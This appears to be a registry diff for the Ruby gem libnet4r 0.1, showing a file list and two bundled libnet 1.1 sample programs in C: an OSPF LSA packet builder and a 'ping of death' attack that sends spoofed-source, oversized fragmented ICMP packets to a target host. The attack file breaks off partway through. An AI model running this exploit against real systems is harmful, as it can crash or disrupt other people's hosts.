libnet4r 0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- data/CHANGELOG +15 -0
- data/LICENSE +28 -0
- data/README +187 -0
- data/Rakefile +110 -0
- data/ext/extconf.rb +60 -0
- data/ext/libnet.c +705 -0
- data/ext/libnet_arp.c +152 -0
- data/ext/libnet_ethernet.c +115 -0
- data/ext/libnet_ipv4.c +140 -0
- data/ext/libnet_ipv6.c +138 -0
- data/ext/libnet_udp.c +112 -0
- data/ext/libnet_vlan.c +131 -0
- data/lib/libnet4r/header.rb +609 -0
- data/lib/libnet4r/helpers.rb +19 -0
- data/lib/libnet4r/libnet.rb +39 -0
- data/libnet/CVS/Entries +24 -0
- data/libnet/CVS/Repository +1 -0
- data/libnet/CVS/Root +1 -0
- data/libnet/Makefile.am +15 -0
- data/libnet/Makefile.am.common +10 -0
- data/libnet/Makefile.in +443 -0
- data/libnet/README +21 -0
- data/libnet/VERSION +1 -0
- data/libnet/acconfig.h +36 -0
- data/libnet/acinclude.m4 +463 -0
- data/libnet/aclocal.m4 +1337 -0
- data/libnet/autom4te.cache/CVS/Entries +1 -0
- data/libnet/autom4te.cache/CVS/Repository +1 -0
- data/libnet/autom4te.cache/CVS/Root +1 -0
- data/libnet/autom4te.cache/output.0 +6225 -0
- data/libnet/autom4te.cache/requests +111 -0
- data/libnet/autom4te.cache/traces.0 +272 -0
- data/libnet/config.guess +1314 -0
- data/libnet/config.sub +1410 -0
- data/libnet/configure +6225 -0
- data/libnet/configure.in +235 -0
- data/libnet/doc/BUGS +19 -0
- data/libnet/doc/CHANGELOG +527 -0
- data/libnet/doc/CONTRIB +53 -0
- data/libnet/doc/COPYING +31 -0
- data/libnet/doc/CVS/Entries +12 -0
- data/libnet/doc/CVS/Repository +1 -0
- data/libnet/doc/CVS/Root +1 -0
- data/libnet/doc/DESIGN_NOTES +134 -0
- data/libnet/doc/MIGRATION +172 -0
- data/libnet/doc/PACKET_BUILDING +161 -0
- data/libnet/doc/PORTED +45 -0
- data/libnet/doc/RAWSOCKET_NON_SEQUITUR +41 -0
- data/libnet/doc/TODO +96 -0
- data/libnet/doc/html/acconfig_8h-source.html +49 -0
- data/libnet/doc/html/annotated.html +17 -0
- data/libnet/doc/html/bpf_8h-source.html +277 -0
- data/libnet/doc/html/config_8h-source.html +125 -0
- data/libnet/doc/html/doxygen.css +169 -0
- data/libnet/doc/html/doxygen.png +0 -0
- data/libnet/doc/html/files.html +29 -0
- data/libnet/doc/html/functions.html +26 -0
- data/libnet/doc/html/functions_vars.html +26 -0
- data/libnet/doc/html/getopt_8h-source.html +97 -0
- data/libnet/doc/html/globals.html +219 -0
- data/libnet/doc/html/globals_defs.html +104 -0
- data/libnet/doc/html/globals_func.html +136 -0
- data/libnet/doc/html/gnuc_8h-source.html +56 -0
- data/libnet/doc/html/graph_legend.dot +22 -0
- data/libnet/doc/html/graph_legend.html +75 -0
- data/libnet/doc/html/ifaddrlist_8h-source.html +65 -0
- data/libnet/doc/html/in__systm_8h-source.html +90 -0
- data/libnet/doc/html/index.html +17 -0
- data/libnet/doc/html/libnet-asn1_8h-source.html +268 -0
- data/libnet/doc/html/libnet-functions_8h-source.html +742 -0
- data/libnet/doc/html/libnet-functions_8h.html +8844 -0
- data/libnet/doc/html/libnet-headers_8h-source.html +1655 -0
- data/libnet/doc/html/libnet-headers_8h.html +3053 -0
- data/libnet/doc/html/libnet-macros_8h-source.html +161 -0
- data/libnet/doc/html/libnet-macros_8h.html +358 -0
- data/libnet/doc/html/libnet-structures_8h-source.html +233 -0
- data/libnet/doc/html/libnet-types_8h-source.html +58 -0
- data/libnet/doc/html/libnet_8h-source.html +119 -0
- data/libnet/doc/html/libnet_8h.html +24 -0
- data/libnet/doc/html/structlibnet__802__1q__hdr.html +145 -0
- data/libnet/doc/html/structlibnet__802__1x__hdr.html +97 -0
- data/libnet/doc/libnet.doxygen.conf +1102 -0
- data/libnet/doc/man/CVS/Entries +1 -0
- data/libnet/doc/man/CVS/Repository +1 -0
- data/libnet/doc/man/CVS/Root +1 -0
- data/libnet/doc/man/man3/libnet-functions.h.3 +3136 -0
- data/libnet/doc/man/man3/libnet-headers.h.3 +1872 -0
- data/libnet/doc/man/man3/libnet-macros.h.3 +172 -0
- data/libnet/doc/man/man3/libnet.h.3 +17 -0
- data/libnet/doc/man/man3/libnet_802_1q_hdr.3 +53 -0
- data/libnet/doc/man/man3/libnet_802_1x_hdr.3 +41 -0
- data/libnet/include/CVS/Entries +10 -0
- data/libnet/include/CVS/Repository +1 -0
- data/libnet/include/CVS/Root +1 -0
- data/libnet/include/Makefile.am +7 -0
- data/libnet/include/Makefile.in +395 -0
- data/libnet/include/bpf.h +264 -0
- data/libnet/include/config.h.in +118 -0
- data/libnet/include/gnuc.h +43 -0
- data/libnet/include/ifaddrlist.h +52 -0
- data/libnet/include/libnet/CVS/Entries +9 -0
- data/libnet/include/libnet/CVS/Repository +1 -0
- data/libnet/include/libnet/CVS/Root +1 -0
- data/libnet/include/libnet/Makefile.am +12 -0
- data/libnet/include/libnet/Makefile.in +294 -0
- data/libnet/include/libnet/libnet-asn1.h +255 -0
- data/libnet/include/libnet/libnet-functions.h +2157 -0
- data/libnet/include/libnet/libnet-headers.h +1662 -0
- data/libnet/include/libnet/libnet-macros.h +186 -0
- data/libnet/include/libnet/libnet-structures.h +222 -0
- data/libnet/include/libnet/libnet-types.h +45 -0
- data/libnet/include/libnet.h.in +132 -0
- data/libnet/include/stamp-h.in +1 -0
- data/libnet/include/win32/CVS/Entries +5 -0
- data/libnet/include/win32/CVS/Repository +1 -0
- data/libnet/include/win32/CVS/Root +1 -0
- data/libnet/include/win32/config.h +112 -0
- data/libnet/include/win32/getopt.h +84 -0
- data/libnet/include/win32/in_systm.h +77 -0
- data/libnet/include/win32/libnet.h +106 -0
- data/libnet/install-sh +250 -0
- data/libnet/libnet-config.in +62 -0
- data/libnet/libnet.doxygen.conf +1102 -0
- data/libnet/man/CVS/Entries +1 -0
- data/libnet/man/CVS/Repository +1 -0
- data/libnet/man/CVS/Root +1 -0
- data/libnet/missing +283 -0
- data/libnet/mkinstalldirs +40 -0
- data/libnet/sample/CVS/Entries +47 -0
- data/libnet/sample/CVS/Repository +1 -0
- data/libnet/sample/CVS/Root +1 -0
- data/libnet/sample/Makefile.am +63 -0
- data/libnet/sample/Makefile.in +729 -0
- data/libnet/sample/arp-new.c +144 -0
- data/libnet/sample/arp.c +151 -0
- data/libnet/sample/bgp4_hdr.c +225 -0
- data/libnet/sample/bgp4_notification.c +242 -0
- data/libnet/sample/bgp4_open.c +266 -0
- data/libnet/sample/bgp4_update.c +337 -0
- data/libnet/sample/cdp.c +187 -0
- data/libnet/sample/dhcp_discover.c +257 -0
- data/libnet/sample/dns.c +260 -0
- data/libnet/sample/dot1x.c +113 -0
- data/libnet/sample/fddi_tcp1.c +213 -0
- data/libnet/sample/fddi_tcp2.c +209 -0
- data/libnet/sample/get_addr.c +112 -0
- data/libnet/sample/gre.c +410 -0
- data/libnet/sample/icmp6_echoreq.c +184 -0
- data/libnet/sample/icmp_echo_cq.c +201 -0
- data/libnet/sample/icmp_redirect.c +200 -0
- data/libnet/sample/icmp_timeexceed.c +190 -0
- data/libnet/sample/icmp_timestamp.c +157 -0
- data/libnet/sample/icmp_unreach.c +204 -0
- data/libnet/sample/ieee.c +177 -0
- data/libnet/sample/ip_link.c +201 -0
- data/libnet/sample/ip_raw.c +180 -0
- data/libnet/sample/isl.c +167 -0
- data/libnet/sample/libnet_test.h +60 -0
- data/libnet/sample/mpls.c +251 -0
- data/libnet/sample/ntp.c +193 -0
- data/libnet/sample/ospf_hello.c +179 -0
- data/libnet/sample/ospf_lsa.c +190 -0
- data/libnet/sample/ping_of_death.c +171 -0
- data/libnet/sample/rpc_tcp.c +214 -0
- data/libnet/sample/rpc_udp.c +213 -0
- data/libnet/sample/sebek.c +299 -0
- data/libnet/sample/smurf.c +194 -0
- data/libnet/sample/stp.c +227 -0
- data/libnet/sample/synflood.c +200 -0
- data/libnet/sample/synflood6.c +209 -0
- data/libnet/sample/synflood6_frag.c +234 -0
- data/libnet/sample/tcp1.c +227 -0
- data/libnet/sample/tcp2.c +192 -0
- data/libnet/sample/tftp.c +207 -0
- data/libnet/sample/tring_tcp1.c +214 -0
- data/libnet/sample/tring_tcp2.c +210 -0
- data/libnet/sample/udp1.c +223 -0
- data/libnet/sample/udp2.c +232 -0
- data/libnet/sample/win32/CVS/Entries +9 -0
- data/libnet/sample/win32/CVS/Repository +1 -0
- data/libnet/sample/win32/CVS/Root +1 -0
- data/libnet/sample/win32/arp/CVS/Entries +2 -0
- data/libnet/sample/win32/arp/CVS/Repository +1 -0
- data/libnet/sample/win32/arp/CVS/Root +1 -0
- data/libnet/sample/win32/arp/arp.vcproj +136 -0
- data/libnet/sample/win32/cdp/CVS/Entries +2 -0
- data/libnet/sample/win32/cdp/CVS/Repository +1 -0
- data/libnet/sample/win32/cdp/CVS/Root +1 -0
- data/libnet/sample/win32/cdp/cdp.vcproj +136 -0
- data/libnet/sample/win32/dhcp_discover/CVS/Entries +2 -0
- data/libnet/sample/win32/dhcp_discover/CVS/Repository +1 -0
- data/libnet/sample/win32/dhcp_discover/CVS/Root +1 -0
- data/libnet/sample/win32/dhcp_discover/dhcp_discover.vcproj +139 -0
- data/libnet/sample/win32/dns/CVS/Entries +2 -0
- data/libnet/sample/win32/dns/CVS/Repository +1 -0
- data/libnet/sample/win32/dns/CVS/Root +1 -0
- data/libnet/sample/win32/dns/dns.vcproj +139 -0
- data/libnet/sample/win32/get_addr/CVS/Entries +2 -0
- data/libnet/sample/win32/get_addr/CVS/Repository +1 -0
- data/libnet/sample/win32/get_addr/CVS/Root +1 -0
- data/libnet/sample/win32/get_addr/get_addr.vcproj +139 -0
- data/libnet/sample/win32/getopt.c +121 -0
- data/libnet/sample/win32/icmp_echo_cq/CVS/Entries +2 -0
- data/libnet/sample/win32/icmp_echo_cq/CVS/Repository +1 -0
- data/libnet/sample/win32/icmp_echo_cq/CVS/Root +1 -0
- data/libnet/sample/win32/icmp_echo_cq/icmp_echo_cq.vcproj +139 -0
- data/libnet/sample/win32/tcp1/CVS/Entries +2 -0
- data/libnet/sample/win32/tcp1/CVS/Repository +1 -0
- data/libnet/sample/win32/tcp1/CVS/Root +1 -0
- data/libnet/sample/win32/tcp1/tcp1.vcproj +142 -0
- data/libnet/sample/win32/udp1/CVS/Entries +3 -0
- data/libnet/sample/win32/udp1/CVS/Repository +1 -0
- data/libnet/sample/win32/udp1/CVS/Root +1 -0
- data/libnet/sample/win32/udp1/dns.vcproj +125 -0
- data/libnet/sample/win32/udp1/udp1.vcproj +139 -0
- data/libnet/src/CVS/Entries +60 -0
- data/libnet/src/CVS/Repository +1 -0
- data/libnet/src/CVS/Root +1 -0
- data/libnet/src/Makefile.am +71 -0
- data/libnet/src/Makefile.in +428 -0
- data/libnet/src/libnet_advanced.c +136 -0
- data/libnet/src/libnet_asn1.c +436 -0
- data/libnet/src/libnet_build_802.1q.c +115 -0
- data/libnet/src/libnet_build_802.1x.c +103 -0
- data/libnet/src/libnet_build_802.2.c +167 -0
- data/libnet/src/libnet_build_802.3.c +101 -0
- data/libnet/src/libnet_build_arp.c +169 -0
- data/libnet/src/libnet_build_bgp.c +350 -0
- data/libnet/src/libnet_build_cdp.c +191 -0
- data/libnet/src/libnet_build_data.c +90 -0
- data/libnet/src/libnet_build_dhcp.c +156 -0
- data/libnet/src/libnet_build_dns.c +129 -0
- data/libnet/src/libnet_build_ethernet.c +173 -0
- data/libnet/src/libnet_build_fddi.c +191 -0
- data/libnet/src/libnet_build_gre.c +427 -0
- data/libnet/src/libnet_build_icmp.c +437 -0
- data/libnet/src/libnet_build_igmp.c +112 -0
- data/libnet/src/libnet_build_ip.c +892 -0
- data/libnet/src/libnet_build_ipsec.c +232 -0
- data/libnet/src/libnet_build_isl.c +113 -0
- data/libnet/src/libnet_build_link.c +90 -0
- data/libnet/src/libnet_build_mpls.c +112 -0
- data/libnet/src/libnet_build_ntp.c +121 -0
- data/libnet/src/libnet_build_ospf.c +699 -0
- data/libnet/src/libnet_build_rip.c +108 -0
- data/libnet/src/libnet_build_rpc.c +138 -0
- data/libnet/src/libnet_build_sebek.c +108 -0
- data/libnet/src/libnet_build_snmp.c +52 -0
- data/libnet/src/libnet_build_stp.c +222 -0
- data/libnet/src/libnet_build_tcp.c +365 -0
- data/libnet/src/libnet_build_token_ring.c +193 -0
- data/libnet/src/libnet_build_udp.c +111 -0
- data/libnet/src/libnet_build_vrrp.c +117 -0
- data/libnet/src/libnet_checksum.c +376 -0
- data/libnet/src/libnet_cq.c +395 -0
- data/libnet/src/libnet_crc.c +113 -0
- data/libnet/src/libnet_dll.c +47 -0
- data/libnet/src/libnet_error.c +55 -0
- data/libnet/src/libnet_if_addr.c +415 -0
- data/libnet/src/libnet_init.c +234 -0
- data/libnet/src/libnet_internal.c +310 -0
- data/libnet/src/libnet_link_bpf.c +348 -0
- data/libnet/src/libnet_link_dlpi.c +785 -0
- data/libnet/src/libnet_link_linux.c +310 -0
- data/libnet/src/libnet_link_nit.c +125 -0
- data/libnet/src/libnet_link_none.c +66 -0
- data/libnet/src/libnet_link_pf.c +179 -0
- data/libnet/src/libnet_link_snit.c +149 -0
- data/libnet/src/libnet_link_snoop.c +166 -0
- data/libnet/src/libnet_link_win32.c +346 -0
- data/libnet/src/libnet_pblock.c +511 -0
- data/libnet/src/libnet_port_list.c +295 -0
- data/libnet/src/libnet_prand.c +106 -0
- data/libnet/src/libnet_raw.c +257 -0
- data/libnet/src/libnet_resolve.c +414 -0
- data/libnet/src/libnet_version.c +54 -0
- data/libnet/src/libnet_write.c +502 -0
- data/libnet/version.h.in +6 -0
- data/libnet/win32/CVS/Entries +15 -0
- data/libnet/win32/CVS/Repository +1 -0
- data/libnet/win32/CVS/Root +1 -0
- data/libnet/win32/Libnet-1.1.1-2002.sln +77 -0
- data/libnet/win32/Libnet-1.1.1-2003.ncb +0 -0
- data/libnet/win32/Libnet-1.1.1-2003.sln +84 -0
- data/libnet/win32/Libnet-1.1.1-2003.suo +0 -0
- data/libnet/win32/Libnet-1.1.1.vcproj +311 -0
- data/libnet/win32/Libnet-latest.ncb +0 -0
- data/libnet/win32/Libnet-latest.opt +0 -0
- data/libnet/win32/Libnet-latest.sln +77 -0
- data/libnet/win32/Libnet-latest.suo +0 -0
- data/libnet/win32/Libnet-latest.vcproj +311 -0
- data/libnet/win32/Libnet.dsp +337 -0
- data/libnet/win32/Libnet.dsw +32 -0
- data/libnet/win32/README.txt +57 -0
- data/libnet/win32/libnet_dll.def +164 -0
- data/test/tc_arp.rb +169 -0
- data/test/tc_class.rb +219 -0
- data/test/tc_ethernet.rb +97 -0
- data/test/tc_header.rb +163 -0
- data/test/tc_init.rb +25 -0
- data/test/tc_ipv4.rb +219 -0
- data/test/tc_ipv6.rb +235 -0
- data/test/tc_udp.rb +229 -0
- data/test/tc_vlan.rb +118 -0
- data/test/ts_all.rb +15 -0
- metadata +401 -0
@@ -0,0 +1,190 @@
|
|
1
|
+
/*
|
2
|
+
* $Id: ospf_lsa.c,v 1.2 2004/01/03 20:31:01 mike Exp $
|
3
|
+
*
|
4
|
+
* libnet 1.1
|
5
|
+
* Build an OSPF LSA packet
|
6
|
+
*
|
7
|
+
* Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
|
8
|
+
* All rights reserved.
|
9
|
+
*
|
10
|
+
* Copyright (c) 1999, 2000 Andrew Reiter <areiter@bindview.com>
|
11
|
+
* All rights reserved.
|
12
|
+
*
|
13
|
+
* Redistribution and use in source and binary forms, with or without
|
14
|
+
* modification, are permitted provided that the following conditions
|
15
|
+
* are met:
|
16
|
+
* 1. Redistributions of source code must retain the above copyright
|
17
|
+
* notice, this list of conditions and the following disclaimer.
|
18
|
+
* 2. Redistributions in binary form must reproduce the above copyright
|
19
|
+
* notice, this list of conditions and the following disclaimer in the
|
20
|
+
* documentation and/or other materials provided with the distribution.
|
21
|
+
*
|
22
|
+
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
|
23
|
+
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
24
|
+
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
25
|
+
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
|
26
|
+
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
27
|
+
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
|
28
|
+
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
29
|
+
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
|
30
|
+
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
|
31
|
+
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
32
|
+
* SUCH DAMAGE.
|
33
|
+
*
|
34
|
+
*/
|
35
|
+
|
36
|
+
#if (HAVE_CONFIG_H)
|
37
|
+
#include "../include/config.h"
|
38
|
+
#endif
|
39
|
+
#include "./libnet_test.h"
|
40
|
+
|
41
|
+
|
42
|
+
int
|
43
|
+
main(int argc, char **argv)
|
44
|
+
{
|
45
|
+
int c;
|
46
|
+
libnet_t *l;
|
47
|
+
libnet_ptag_t t;
|
48
|
+
u_long src, dst;
|
49
|
+
u_char auth[8] = {0,0,0,0,0,0,0,0};
|
50
|
+
char *from, *to, errbuf[LIBNET_ERRBUF_SIZE];
|
51
|
+
|
52
|
+
printf("libnet 1.1 OSPF LSA packet shaping[raw]\n");
|
53
|
+
|
54
|
+
if (argc != 3)
|
55
|
+
{
|
56
|
+
usage(argv[0]);
|
57
|
+
}
|
58
|
+
|
59
|
+
from = argv[1];
|
60
|
+
to = argv[2];
|
61
|
+
|
62
|
+
/*
|
63
|
+
* Initialize the library. Root priviledges are required.
|
64
|
+
*/
|
65
|
+
l = libnet_init(
|
66
|
+
LIBNET_RAW4, /* injection type */
|
67
|
+
NULL, /* network interface */
|
68
|
+
errbuf); /* errbuf */
|
69
|
+
|
70
|
+
if (l == NULL)
|
71
|
+
{
|
72
|
+
fprintf(stderr, "libnet_init() failed: %s", errbuf);
|
73
|
+
exit(EXIT_FAILURE);
|
74
|
+
}
|
75
|
+
|
76
|
+
/* Too lazy to check for error */
|
77
|
+
src = libnet_name2addr4(l, from, LIBNET_DONT_RESOLVE);
|
78
|
+
dst = libnet_name2addr4(l, to, LIBNET_DONT_RESOLVE);
|
79
|
+
|
80
|
+
t = libnet_build_ospfv2_lsa_net(
|
81
|
+
0xffffff00, /* netmask */
|
82
|
+
0xc0ffee00, /* router id */
|
83
|
+
NULL, /* payload */
|
84
|
+
0, /* payload size */
|
85
|
+
l, /* libnet handle */
|
86
|
+
0); /* libnet id */
|
87
|
+
if (t == -1)
|
88
|
+
{
|
89
|
+
fprintf(stderr, "Can't build LSA net header: %s\n", libnet_geterror(l));
|
90
|
+
goto bad;
|
91
|
+
}
|
92
|
+
|
93
|
+
t = libnet_build_ospfv2_lsa(
|
94
|
+
40, /* packet age */
|
95
|
+
0, /* options */
|
96
|
+
LIBNET_LS_TYPE_NET, /* type */
|
97
|
+
htonl(0xc0ffee00), /* LS id */
|
98
|
+
src, /* ad router */
|
99
|
+
0x11111111, /* seq */
|
100
|
+
0xffff, /* checksum */
|
101
|
+
LIBNET_OSPF_LS_NET_H + LIBNET_OSPF_LSA_H, /* packet length */
|
102
|
+
NULL, /* payload */
|
103
|
+
0, /* payload size */
|
104
|
+
l, /* libnet handle */
|
105
|
+
0); /* libnet id */
|
106
|
+
if (t == -1)
|
107
|
+
{
|
108
|
+
fprintf(stderr, "Can't build LSA header: %s\n", libnet_geterror(l));
|
109
|
+
goto bad;
|
110
|
+
}
|
111
|
+
|
112
|
+
/* authentication data */
|
113
|
+
t = libnet_build_data(
|
114
|
+
auth, /* auth data */
|
115
|
+
LIBNET_OSPF_AUTH_H, /* payload size */
|
116
|
+
l, /* libnet handle */
|
117
|
+
0); /* libnet id */
|
118
|
+
if (t == -1)
|
119
|
+
{
|
120
|
+
fprintf(stderr, "Can't build OSPF AUTH header: %s\n", libnet_geterror(l));
|
121
|
+
goto bad;
|
122
|
+
}
|
123
|
+
|
124
|
+
t = libnet_build_ospfv2(
|
125
|
+
LIBNET_OSPF_LSA_H + LIBNET_OSPF_AUTH_H +
|
126
|
+
LIBNET_OSPF_LS_NET_H, /* OSPF packet length */
|
127
|
+
LIBNET_OSPF_LSA, /* OSPF packet type */
|
128
|
+
htonl(0xd000000d), /* router id */
|
129
|
+
htonl(0xc0ffee00), /* area id */
|
130
|
+
0, /* checksum */
|
131
|
+
LIBNET_OSPF_AUTH_NULL, /* auth type */
|
132
|
+
NULL, /* payload */
|
133
|
+
0, /* payload size */
|
134
|
+
l, /* libnet handle */
|
135
|
+
0); /* libnet id */
|
136
|
+
if (t == -1)
|
137
|
+
{
|
138
|
+
fprintf(stderr, "Can't build OSPF header: %s\n", libnet_geterror(l));
|
139
|
+
goto bad;
|
140
|
+
}
|
141
|
+
|
142
|
+
t = libnet_build_ipv4(
|
143
|
+
LIBNET_IPV4_H + LIBNET_OSPF_H + LIBNET_OSPF_AUTH_H +
|
144
|
+
LIBNET_OSPF_LSA_H + LIBNET_OSPF_LS_NET_H, /* packet total length */
|
145
|
+
0, /* TOS */
|
146
|
+
101, /* IP iD */
|
147
|
+
IP_DF, /* IP frag */
|
148
|
+
254, /* TTL */
|
149
|
+
IPPROTO_OSPF, /* protocol */
|
150
|
+
0, /* checksum */
|
151
|
+
src, /* source IP */
|
152
|
+
dst, /* destination IP */
|
153
|
+
NULL, /* payload */
|
154
|
+
0, /* payload size */
|
155
|
+
l, /* libnet handle */
|
156
|
+
0); /* libnet id */
|
157
|
+
if (t == -1)
|
158
|
+
{
|
159
|
+
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
|
160
|
+
goto bad;
|
161
|
+
}
|
162
|
+
|
163
|
+
/*
|
164
|
+
* Write it to the wire.
|
165
|
+
*/
|
166
|
+
c = libnet_write(l);
|
167
|
+
if (c == -1)
|
168
|
+
{
|
169
|
+
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
|
170
|
+
goto bad;
|
171
|
+
}
|
172
|
+
else
|
173
|
+
{
|
174
|
+
fprintf(stderr, "Wrote %d byte OSPF packet; check the wire.\n",
|
175
|
+
c);
|
176
|
+
}
|
177
|
+
libnet_destroy(l);
|
178
|
+
return (EXIT_SUCCESS);
|
179
|
+
bad:
|
180
|
+
libnet_destroy(l);
|
181
|
+
return (EXIT_FAILURE);
|
182
|
+
}
|
183
|
+
|
184
|
+
|
185
|
+
void
|
186
|
+
usage(char *pname)
|
187
|
+
{
|
188
|
+
printf("Usage: %s <source ip> <dest. ip>\n", pname);
|
189
|
+
exit(0);
|
190
|
+
}
|
@@ -0,0 +1,171 @@
|
|
1
|
+
/*
|
2
|
+
* $Id: ping_of_death.c,v 1.2 2004/01/03 20:31:01 mike Exp $
|
3
|
+
*
|
4
|
+
* libnet 1.1
|
5
|
+
* ICMP ping of death attack
|
6
|
+
*
|
7
|
+
* Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
|
8
|
+
* All rights reserved.
|
9
|
+
*
|
10
|
+
* Copyright (c) 1999 - 2001 Dug Song <dugsong@monkey.org>
|
11
|
+
* All rights reserved.
|
12
|
+
*
|
13
|
+
* Redistribution and use in source and binary forms, with or without
|
14
|
+
* modification, are permitted provided that the following conditions
|
15
|
+
* are met:
|
16
|
+
* 1. Redistributions of source code must retain the above copyright
|
17
|
+
* notice, this list of conditions and the following disclaimer.
|
18
|
+
* 2. Redistributions in binary form must reproduce the above copyright
|
19
|
+
* notice, this list of conditions and the following disclaimer in the
|
20
|
+
* documentation and/or other materials provided with the distribution.
|
21
|
+
*
|
22
|
+
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
|
23
|
+
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
24
|
+
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
25
|
+
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
|
26
|
+
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
27
|
+
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
|
28
|
+
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
29
|
+
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
|
30
|
+
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
|
31
|
+
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
32
|
+
* SUCH DAMAGE.
|
33
|
+
*
|
34
|
+
*/
|
35
|
+
|
36
|
+
#if (HAVE_CONFIG_H)
|
37
|
+
#include "../include/config.h"
|
38
|
+
#endif
|
39
|
+
#include "./libnet_test.h"
|
40
|
+
|
41
|
+
|
42
|
+
#define FRAG_LEN 1472
|
43
|
+
|
44
|
+
int
|
45
|
+
main(int argc, char **argv)
|
46
|
+
{
|
47
|
+
libnet_t *l;
|
48
|
+
libnet_ptag_t ip;
|
49
|
+
libnet_ptag_t icmp;
|
50
|
+
struct libnet_stats ls;
|
51
|
+
u_long fakesrc, target;
|
52
|
+
u_char *data;
|
53
|
+
int c, i, flags, offset, len;
|
54
|
+
char errbuf[LIBNET_ERRBUF_SIZE];
|
55
|
+
|
56
|
+
printf("libnet 1.1 Ping of Death[raw]\n");
|
57
|
+
|
58
|
+
/*
|
59
|
+
* Initialize the library. Root priviledges are required.
|
60
|
+
*/
|
61
|
+
l = libnet_init(
|
62
|
+
LIBNET_RAW4, /* injection type */
|
63
|
+
NULL, /* network interface */
|
64
|
+
errbuf); /* errbuf */
|
65
|
+
|
66
|
+
if (l == NULL)
|
67
|
+
{
|
68
|
+
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
|
69
|
+
exit(EXIT_FAILURE);
|
70
|
+
}
|
71
|
+
|
72
|
+
if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
|
73
|
+
{
|
74
|
+
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
|
75
|
+
exit(EXIT_FAILURE);
|
76
|
+
}
|
77
|
+
|
78
|
+
/* get random src addr. */
|
79
|
+
libnet_seed_prand(l);
|
80
|
+
fakesrc = libnet_get_prand(LIBNET_PRu32);
|
81
|
+
|
82
|
+
data = malloc(FRAG_LEN);
|
83
|
+
for (i = 0 ; i < FRAG_LEN ; i++)
|
84
|
+
{
|
85
|
+
/* fill it with something */
|
86
|
+
data[i] = 0x3a;
|
87
|
+
}
|
88
|
+
|
89
|
+
ip = LIBNET_PTAG_INITIALIZER;
|
90
|
+
icmp = LIBNET_PTAG_INITIALIZER;
|
91
|
+
|
92
|
+
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
|
93
|
+
{
|
94
|
+
offset = i;
|
95
|
+
flags = 0;
|
96
|
+
|
97
|
+
if (offset < 65120)
|
98
|
+
{
|
99
|
+
flags = IP_MF;
|
100
|
+
len = FRAG_LEN;
|
101
|
+
}
|
102
|
+
else
|
103
|
+
{
|
104
|
+
/* for a total reconstructed length of 65538 bytes */
|
105
|
+
len = 410;
|
106
|
+
}
|
107
|
+
|
108
|
+
icmp = libnet_build_icmpv4_echo(
|
109
|
+
ICMP_ECHO, /* type */
|
110
|
+
0, /* code */
|
111
|
+
0, /* checksum */
|
112
|
+
666, /* id */
|
113
|
+
666, /* sequence */
|
114
|
+
data, /* payload */
|
115
|
+
len, /* payload size */
|
116
|
+
l, /* libnet handle */
|
117
|
+
icmp); /* libnet ptag */
|
118
|
+
if (icmp == -1)
|
119
|
+
{
|
120
|
+
fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
|
121
|
+
goto bad;
|
122
|
+
}
|
123
|
+
/* no reason to do this */
|
124
|
+
libnet_toggle_checksum(l, icmp, 0);
|
125
|
+
|
126
|
+
ip = libnet_build_ipv4(
|
127
|
+
LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
|
128
|
+
0, /* TOS */
|
129
|
+
666, /* IP ID */
|
130
|
+
flags | (offset >> 3), /* IP Frag */
|
131
|
+
64, /* TTL */
|
132
|
+
IPPROTO_ICMP, /* protocol */
|
133
|
+
0, /* checksum */
|
134
|
+
fakesrc, /* source IP */
|
135
|
+
target, /* destination IP */
|
136
|
+
NULL, /* payload */
|
137
|
+
0, /* payload size */
|
138
|
+
l, /* libnet handle */
|
139
|
+
ip); /* libnet ptag */
|
140
|
+
if (ip == -1)
|
141
|
+
{
|
142
|
+
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
|
143
|
+
goto bad;
|
144
|
+
}
|
145
|
+
|
146
|
+
c = libnet_write(l);
